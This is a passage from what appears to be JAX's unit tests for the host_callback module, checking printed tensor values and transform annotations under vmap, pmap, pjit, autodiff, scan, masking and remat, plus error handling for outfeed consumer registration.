assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = jax.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = jax.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00 [4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j, built with two nested vmaps
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return jax.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
jax.jit(jax.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = jax.jit(jax.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms_old_doc(self):
if not FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for new behavior")
# Examples from the documentation
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.] [0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3. 9. ) ( 0.1 0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0. [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_transforms_doc(self):
# Examples from the documentation
if FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for old behavior")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_jvp
def print_tangents(arg):
return None
@print_tangents.defjvp
def print_tangents_jvp(primals, tangents):
arg_dot, = tangents
hcb.id_print(arg_dot, what="tangents", output_stream=testing_stream)
return primals, tangents
def power3_with_tangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
print_tangents((x, y))
return y * x
print(f"jvp = {jax.jvp(power3_with_tangents, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: tangents
( 0.1 0.6 )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
# Only the primals by default
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_vjp
def print_cotangents(arg):
# Must return the argument for which we want the cotangent.
return arg
# f_fwd: a -> (b, residual)
def print_cotangents_fwd(arg):
return print_cotangents(arg), None
# f_bwd: (residual, CT b) -> [CT a]
def print_cotangents_bwd(residual, ct_b):
hcb.id_print(ct_b, what="cotangents", output_stream=testing_stream)
return ct_b,
print_cotangents.defvjp(print_cotangents_fwd, print_cotangents_bwd)
def power3_with_cotangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
# Must use the output of print_cotangents
(x1, y1) = print_cotangents((x, y))
return y1 * x1
print(f"grad = {jax.grad(power3_with_cotangents)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: cotangents
( 9. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# TODO: grad of grad
print(f"vmap = {jax.vmap(power3)(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3_with_cotangents))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: [('batch', {'batch_dims': (0, 0)})] what: cotangents
( [4. 9.] [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad o remat = {jax.grad(lambda x: power3(ad_checkpoint.checkpoint(power3)(x)))(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: x,x^2
( 27. 729. )
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = jax.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3 9 )
device: cpu:1 what: x,x^2
( 4 16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = jax.pmap(
jax.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
if FLAGS.jax_host_callback_ad_transforms:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
else:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[200.00 202.00 204.00]
[220.00 222.00 224.00]]""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute the inner function for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
@unittest.skip("cond of pmap does not work in JAX. Issue #5178.")
def test_tap_cond_pmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(jax.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
jax.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
testing_stream.output)
else:
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_client.XlaBuilder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xops.Constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
def test_tap_remat_0(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, jax.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
use_result=use_result, use_remat=use_remat, grad_func=grad_func)
for use_result in [True, False]
for grad_func in ["grad", "value_and_grad"]
for use_remat in ["old", "new", "none"]))
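# The cross-product above yields 2 (use_result) x 2 (grad_func) x 3 (use_remat)
# = 12 generated test cases.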
def test_tap_remat(self, use_result=False, grad_func="grad", use_remat="new"):
def f(x):
id_print_result = hcb.id_print(x, output_stream=testing_stream)
if use_result:
x = id_print_result
return 3. * x
grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
if use_remat == "old":
trans_f = jax.remat(f)
elif use_remat == "new":
trans_f = ad_checkpoint.checkpoint(f)
else:
assert use_remat == "none"
trans_f = f
print(jax.make_jaxpr(grad_f(trans_f))(2.))
grad_f(trans_f)(2.)
hcb.barrier_wait()
if use_remat == "none":
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
transforms: ['jvp', 'transpose']
3."""
else:
# GOOD: whether or not we use_result, in the absence of
# jax_host_callback_ad_transforms we get the same callback.
expected = "2."
else:
expected = "2."
else: # use_remat
if use_result:
if FLAGS.jax_host_callback_ad_transforms:
expected = """
2.
2.
transforms: ['jvp', 'transpose']
3."""
else:
expected = """
2.
2."""
else:
if use_remat == "old":
# TODO: we should see two callbacks
expected = ""
else:
# Good: we see two callbacks, whether or not we use the result.
expected = """
2.
2."""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
